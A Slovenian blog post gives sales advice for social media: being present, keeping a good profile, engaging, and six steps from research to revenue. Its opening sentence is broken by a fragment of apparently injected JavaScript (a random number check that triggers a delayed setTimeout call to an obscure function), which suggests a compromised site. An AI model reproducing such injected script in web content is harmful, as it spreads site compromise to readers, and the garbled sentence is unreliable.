fbpx

Prodaja na družbenih omrežjih

Prodaja na družbenih omrežjih

Prodaja na družbenih omrežjih

Dandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andanes je veliko govora o prodaji na družbenih omrežjih. Vsi vemo, da se je svet zelo spremenil v zadnjih nekaj letih. Količina informacij, ki nam je danes na voljo o drugih, korenito spreminja način prodaje. Prodaja na družbenih omrežjih zajema industrijo po industrijo in počasi postaja »obveza« povsod.

Ampak nismo še čisto tam, zato se poraja vprašanje ali je v prodaji že postalo nujno vlagati čas v družbena omrežja ali je za enkrat vse to še vedno samo »opcijsko«. In naš odgovor na to vprašanje bi bil nekako takole. V kolikor delujete v industriji, kjer je vpliv družbenih omrežij velik, potem je biti prodajno prisotni na družbenih omrežjih prav gotovo obveza. V kolikor trenutno na kanalih niste prisotni je še čas, da to storite – priporočljivo in smiselno je, da ste prisotni na vseh kanalih, kjer se nahajajo vaši potencialni kupci.

Prisotnost je obvezna

Ne glede na to, koliko časa vaši kupci preživijo na družbenih omrežjih, morate biti tam prisotni in morate imeti dobro dodelan profil. Priporočljivo je tudi, da do neke mere na družbenih omrežjih tudi sodelujete in niste prisotni samo v obliki izdelanega profila. Zakaj? Zato ker če ne znate sami najti kupcev na spletu, to še ne pomeni da le-ti ne obstajajo. In prav mogoče je, da vas kdo izmed njih najde povsem po »nesreči«. Zato razmislite o treh stvareh:

Prisotnost na družbenih omrežjih: Morate biti prisotni, da vas lahko drugi najdejo! Vaši kupci želijo vedeti čim več o vsa, prav tako kot vi želite vedeti čim več o njih.
Profil: Da lahko naredite dober vtis, potrebujete dobro izdelan profil!
Sodelovanje: Do neke mere morate na družbenih omrežjih tudi sodelovati. Najmanj kar lahko naredite je, da z sledilci delite relevantne podatke. Lahko pa naredite podrobnejšo raziskavo in vidite, kolikšen del vaše ciljne populacije sodeluje na družbenih omrežjih in se temu prilagodite. Lahko celo poiščete in se povežete z drugimi, ki prav tako delujejo v enaki industriji kot vi. Obdajte se s konkurenco, učite se na njihovih napakah in uspehih.

6 korakov do uspeha

Ko boste ugotovili vam primerno stopnjo prisotnosti na družbenih omrežjih, je čas, da razmislite kako tam dejansko tudi prodati. Vedeti morate, da uporabniki družbenih omrežij niso tam z namenom, da bi nekaj kupili, zato morate imeti prave prijeme, ko je govora o prodaji na družbenih omrežjih. Drugače vas lahko kaj hitro prično dojemati kot nadležne. In če se vam to zgodi, boste zelo težko kaj tudi prodali. V izogib temu vam svetujemo, da:

 

  • naredite raziskavo,
  • se povežete z ostalimi,
  • poveste, da obstajate,
  • povečate zanimanje za vas,
  • zgradite dobre odnose in
  • te odnose pretvorite v prihodke (R2R – Relationship to revenue).

Začnite torej z raziskavo. Na podlagi ugotovitev se smiselno povežite z ostalimi. Tako boste dosegli določeno stopnjo osveščenosti. V tej točki povejte, da obstajate, delite pomembne informacije itd. in še povečajte stopnjo osveščenosti. Če boste delili prave informacije (na splošni ali na osebni ravni) boste sčasoma povečali tudi zanimanje za vas. Sedaj je čas, da pričnete z prodajnim ciklom. Bolj kot vas bodo poznali, vam zaupali in sodelovali z vami, močnejši bo vaš odnos z njimi. Ta prodajni cikel je lahko zelo dolgotrajen, zato bodite potrpežljivi. Verjemite, izplačalo se bo. V kolikor boste dovolj vztrajni, boste potencialne kupce prej ko slej pretvorili v dejanske in povečali prihodke.

Vsaka stvar zahteva svoj čas

Prodaja na družbenih omrežjih torej zahteva čas. Koliko? Toliko kot od vas zahtevajo kupci. Bolj kot so oni aktivni, bolj morate biti tudi vi! Izredno pomembo pa je tudi to, da se odzovete primerno. Prodaja na družbenih omrežjih je namreč do neke mere povsem svoja znanost. Zato ne uporabljajte prijemov, ki delujejo drugod ampak se podučite o posebnostih prodaje na družbenih omrežjih in jim sledite. Izplačalo se vam bo.

0 Komentarjev

Odgovori

Vaš e-naslov ne bo objavljen. * označuje zahtevana polja

*